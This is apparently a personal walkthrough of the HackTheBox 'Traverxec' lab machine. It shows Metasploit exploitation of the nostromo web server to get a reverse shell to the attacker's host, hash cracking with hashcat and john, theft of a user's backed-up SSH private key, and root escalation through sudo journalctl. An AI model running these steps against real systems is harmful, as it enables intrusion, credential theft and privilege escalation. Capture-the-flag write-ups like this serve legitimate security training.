HTB Traverxec Walkthrough

Welcome to my write up of how I hacked the Traverxec box on HackTheBox!

HTB Traverxec Walkthrough

Welcome to my write up of how I hacked the Traverxec box on HackTheBox! Lets jump right on and start with an nmap scan:

nmap -T4 -A -v

And this is the interesting result:

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).

OK, only two ports and there's one portal. My approach brings me immediately to the portal:

After I navigate around and analyze the portal find nothing interesting. To generate more information, I use tools like OWASP ZAP and wfuzz to identify possible vulnerabilities or point of access to the portal (including the form on the bottom of the page), but nothing emerged. Anyway, there's another interesting information on the nmap result, that gives us information about the name of the used web server and its version: nostromo 1.9.6.

I search on exploit-db and immediate there's reverse shell exploitation on that. It should be also on metasploit framework, so I launch my msfconsole and try to proceed. The only parameter that I have to set is the rhost with the IP address of the target and the lhost value with my IP address.

msf5 > search nostromo

Matching Modules

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set rhosts
rhosts =>
msf5 exploit(multi/http/nostromo_code_exec) > set lhost
lhost =>
msf5 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 3 opened ( -> at 2020-03-07 18:00:31 +0100

As usual, I report only the interesting phases of my attack, but this time, I would describe an interesting "Rabbit Hole", that finally, will be not useful to complete the CTF challenge, but it's interesting and my opinion could be an interesting argument that can give to all of us (or leas something ones) additional know-how.

Found on the /var folder the nostromo directory with the configuration file.

ls -l /var
total 40
drwxr-xr-x  2 root root  4096 Nov 12 06:25 backups
drwxr-xr-x  9 root root  4096 Oct 25 14:34 cache
drwxr-xr-x 26 root root  4096 Nov 12 04:56 lib
drwxrwsr-x  2 root staff 4096 May 13  2019 local
lrwxrwxrwx  1 root root     9 Oct 25 14:15 lock -> /run/lock
drwxr-xr-x  5 root root  4096 Mar  7 07:59 log
drwxrwsr-x  2 root mail  4096 Oct 25 14:15 mail
drwxr-xr-x  6 root root  4096 Oct 25 14:43 nostromo
drwxr-xr-x  2 root root  4096 Oct 25 14:15 opt
lrwxrwxrwx  1 root root     4 Oct 25 14:15 run -> /run
drwxr-xr-x  4 root root  4096 Oct 25 14:16 spool
drwxrwxrwt  3 root root  4096 Mar  7 08:43 tmp
ls -l /var/nostromo
total 16
drwxr-xr-x 2 root     daemon 4096 Oct 27 16:12 conf
drwxr-xr-x 6 root     daemon 4096 Oct 25 17:11 htdocs
drwxr-xr-x 2 root     daemon 4096 Oct 25 14:43 icons
drwxr-xr-x 2 www-data daemon 4096 Mar  7 07:59 logs
ls -l /var/nostromo/conf
total 8
-rw-r--r-- 1 root bin 2928 Oct 25 14:26 mimes
-rw-r--r-- 1 root bin  498 Oct 25 15:20 nhttpd.conf
cat /var/nostromo/conf/nhttpd.conf

servername              traverxec.htb
serverlisten            *
serveradmin             [email protected]
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html


logpid                  logs/


user                    www-data


htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd


/icons                  /var/nostromo/icons


homedirs                /home
homedirs_public         public_www

cat /var/nostromo/conf/.htpasswd

At the bottom of the file there's interesting information, it seems to be the david's credential but is encrypted and we have to recover to the original password.

So I decide to use a hash analyzer; report here the link:

As you can see, it is a simple (so to speak) an MD5 crypt algorithm with salt (salt and hash are visible on the entire key divided by the "$" char and there's another interesting information on the beginning of the key "$1$"). I tried with john the ripper tool, but probably I have mistaken some parameter and I can't find the result. Anyway, back on the page of the analyzer, I found some interesting link. I discovered another tool called hashcat, used to decrypt hashing data. To understand better how to use it, I followed this page:

Here there's a list of all the hashing type known until now (well, there are many), what I did, was to search for my specific hashing type, so I can know the parameter to use the correct algorithm. Searching "$1$" string I found only one occurrence:

500  md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) 2  $1$28772684$iEwNOgGugqO9.bIz5sk8k/

So, I launch the command and cross my finger.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ hashcat -m 500 --force hash.txt /usr/share/wordlists/rockyou.txt     
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1024/2900 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Sat Mar  7 16:33:12 2020 (51 mins, 3 secs)
Time.Estimated...: Sat Mar  7 17:24:15 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3549 H/s (8.83ms) @ Accel:128 Loops:125 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10776576/14344385 (75.13%)
Rejected.........: 0/10776576 (0.00%)
Restore.Point....: 10776320/14344385 (75.13%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: Nowonly4me -> Nov25th

Started: Sat Mar  7 16:33:08 2020
Stopped: Sat Mar  7 17:24:17 2020

Ok, as you can see, on my slow PC, the whole process lasted about fifty minutes.

We have a password now, but, let me say that I'll never use this information during the entire challenge (or better, I tried, but it has never been useful).

For example, I try to access through the ssh with the david user...

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ ssh [email protected]
[email protected]'s password: 
Permission denied, please try again.

...but (as you can see) I can't.

I thought that probably I could be used it on the portal, so I back on the wfuzz tool, to search again some hidden path on the site.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ wfuzz -t 1 -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc=404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.4.5 - The Web Fuzzer                         *

Total requests: 949

ID           Response   Lines    Word     Chars       Payload         ===================================================================

000000223:   200        17 L     46 W     602 Ch      "css"
000000409:   200        18 L     55 W     736 Ch      "icons"
000000413:   200        30 L     163 W    2625 Ch     "img"
000000454:   200        17 L     46 W     596 Ch      "js" 
000000469:   200        23 L     100 W    1487 Ch     "lib"                                       

Total time: 161.0141
Processed Requests: 949
Filtered Requests: 944
Requests/sec.: 5.893893

I used different wordlist files, but nothing found, so, I come back on the only way I found, the shell on the nostromo service web. Navigate again through the folder of the machine and finally, I found something. I read again the configuration file of nostromo where I found the encrypted password before and I see this information:


homedirs                /home
homedirs_public         public_www

I try to search on the home the public_www folder, but it not appear, the only folder on the home directory was the david's folder and it's empty. So, with a small fantasy, I try to do something.

ls -l /home/david/public_www/
total 8
-rw-r--r-- 1 david david  402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
ls -l /home/david/public_www/protected-file-area
total 4
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz

OK, a nice surprise. Give a look in the compressed file.

tar -tvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
drwx------ david/david       0 2019-10-25 17:02 home/david/.ssh/
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/authorized_keys
-rw------- david/david    1766 2019-10-25 17:02 home/david/.ssh/id_rsa
-rw-r--r-- david/david     397 2019-10-25 17:02 home/david/.ssh/

Uhuh... if whats inside is what I think, probably I should be near the first flag, so lets extract it and go deeper.

mkdir /tmp/mydatakkk
ls -l /tmp/mydatakkk
total 0
tar zxvf /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz -C /tmp/mydatakkk
ls -l /tmp/mydatakkk/home/david/.ssh
total 12
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data  397 Oct 25 17:02
cat /tmp/mydatakkk/home/david/.ssh/id_rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

cat /tmp/mydatakkk/home/david/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD [email protected]
cat /tmp/mydatakkk/home/david/.ssh/
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD [email protected]

Yes, it's what I think. I create the private key on my local machine and this time, john the ripper is my best friends.

[email protected]:~/Desktop/hackthebox/_Traverxec - python3 /usr/share/john/ id_rsa > id_rsa.hash
/usr/share/john/ DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:11 DONE (2020-03-08 12:15) 0.08547g/s 1225Kp/s 1225Kc/s 1225KC/sa6_123..*7¡Vamos!
Session completed

Good, the next step is to connect through ssh to the target machine and again cross the finger.

[email protected]:/root/Desktop/hackthebox/_Traverxec -$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Sun Mar  8 07:11:16 2020 from
[email protected]:~$ pwd
[email protected]:~$ ls -l
total 60
drwx------ 3 david david  4096 Mar  8 07:12 bin
-rwxr-xr-x 1 david david 46631 Mar  1 14:36
drwxr-xr-x 3 david david  4096 Oct 25 15:45 public_www
-r--r----- 1 root  david    33 Oct 25 16:14 user.txt
[email protected]:~$ cat user.txt

And the first flag is taken.

Now, I have to confess that turn around for many hours before finding something and, let me say that I had to resort to help in a forum. On the david's folder, there's a directory by the name "bin". Inside there's a sh file with an interesting command.

[email protected]:~/bin$ ls -la 
total 24
drwx------ 2 david david 4096 Mar  8 09:33 .
drwx--x--x 6 david david 4096 Mar  8 09:42 ..
-rw------- 1 david david 1460 Mar  8 09:33
-rw------- 1 david david 1460 Mar  8 09:33
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26
[email protected]:~/bin$ cat 

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

The last line seems to be executed with superuser permissions. I try to launch it on the shell and I can, but, if I try to change some args, the system asks to me for the password (yes, I try with the one found before, but as I said, it doesn't work).

[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:29:23 EDT. --
Mar 08 10:26:47 traverxec sudo[1781]: www-data : command not allowed ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=list
Mar 08 10:26:58 traverxec sudo[1788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/
Mar 08 10:27:08 traverxec sudo[1788]: www-data : command not allowed ; TTY=pts/5 ; PWD=/tmp ; USER=root ; COMMAND=list
Mar 08 10:27:15 traverxec su[1793]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/5 ruser=w
Mar 08 10:27:17 traverxec su[1793]: FAILED SU (to root) www-data on pts/5
[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n6 -unostromo.service
[sudo] password for david: 
[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl
[sudo] password for david: 
[email protected]:~/bin$ 

The important tip that I read in the forum, was about the GTFOBins SUID, that I don't know. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. Nice, so I understand that I can search here something I can use to exploit a permission's elevation and, fortunately, I found the journalctl command.

Ok, I think should be done; last steps and the second flag will be mine.

[email protected]:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Sun 2020-03-08 09:28:40 EDT, end at Sun 2020-03-08 10:36:07 EDT. --
Mar 08 10:30:37 traverxec su[1843]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/6 ruser=w
Mar 08 10:30:39 traverxec su[1843]: FAILED SU (to david) www-data on pts/6
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): conversation failed
Mar 08 10:35:17 traverxec sudo[2080]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Mar 08 10:35:17 traverxec sudo[2080]: www-data : user NOT in sudoers ; TTY=pts/6 ; PWD=/ ; USER=root ; COMMAND=/usr/bin
# ls -l
total 16
-rw------- 1 david david 1460 Mar  8 09:33
-rw------- 1 david david 1460 Mar  8 09:33
-r-------- 1 david david  802 Oct 25 16:26 server-stats.head
-rwx------ 1 david david  363 Oct 25 16:26
# ls -la /root  
total 68
drwx------  3 root root  4096 Mar  8 09:46 .
drwxr-xr-x 18 root root  4096 Oct 25 14:17 ..
lrwxrwxrwx  1 root root     9 Oct 25 16:21 .bash_history -> /dev/null
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
-rw-------  1 root root    47 Mar  8 09:46 .lesshst
drwxr-xr-x  3 root root  4096 Nov 12 04:00 .local
-rw-r--r--  1 root root 37520 Oct 25 14:43 nostromo_1.9.6-1.deb
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-r--------  1 root root    33 Oct 25 16:21 root.txt
# cat /root/root.txt

That's all folks!

The awesome image used in this article is called Braaaaains and it was created by Graham Erwin.